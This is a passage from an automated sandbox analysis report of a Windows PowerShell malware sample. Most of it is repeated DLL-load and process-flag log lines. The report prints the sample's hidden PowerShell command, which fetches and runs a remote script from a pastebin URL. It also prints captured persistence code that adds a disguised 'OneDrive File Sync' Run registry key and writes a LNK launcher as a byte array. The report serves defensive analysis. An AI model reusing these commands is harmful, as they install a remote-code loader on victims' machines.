Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.0.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E78128 push ebx; ret 0_2_00007FF848E7816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E74CD8 push eax; retf 0_2_00007FF848E74CF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E77562 push ebx; iretd 0_2_00007FF848E7756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E74D2D push eax; retf 0_2_00007FF848E74CF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E700BD pushad ; iretd 0_2_00007FF848E700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F56DC3 push edi; iretd 8_2_00007FF848F56DC6

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
